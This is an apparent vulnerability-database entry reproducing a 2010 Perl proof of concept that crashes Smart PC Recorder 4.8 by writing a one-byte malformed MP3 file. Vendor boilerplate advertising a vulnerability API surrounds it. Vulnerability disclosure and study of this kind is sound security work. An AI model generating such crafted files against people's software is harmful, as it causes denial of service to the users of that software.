Lucene search
K

Smart PC Recorder 4.8 .MP3 Local Crash PoC

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 21 Views

Smart PC Recorder 4.8 is vulnerable to local crash via specially crafted MP3 files.

Code

                                                # Exploit Title: Smart PC Recorder .MP3 Local Crash POC
# Date: March 23, 2010
# Author: chap0
# Software Link: http://www.voiceemotion.com/smartrecorder.htm
# Version: Current Version: 4.8
# Tested on: Windows XP SP3/Windows 7
# Cost USD 19.95

#!/usr/bin/perl

#Glory to God
#Won't Bow to Men, I Defy!

print "| Smart PC Recorder .mp3 Local Crash |\n";
print "| Current Version 4.8 Cost 19.95 USD |\n";
print "| Author: chap0                      |\n";
print "|        Always FUZZ IT OUT!         |\n";

my $ezA = "\x41";
my $file = "2ez.mp3";
open (FILE,">$file") or die "[!]Cannot open file";
print FILE "$ezA";
print "\n\tMP3 Created!\n";

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation